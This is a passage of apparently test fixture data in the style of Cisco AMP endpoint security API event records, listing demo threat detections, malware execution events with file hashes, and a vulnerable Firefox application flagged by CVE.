Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546488","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":274000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670856751579000,"timestamp":1610706336,"timestamp_nanoseconds":880000000,"date":"2021-01-15T10:25:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670856751579190","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat 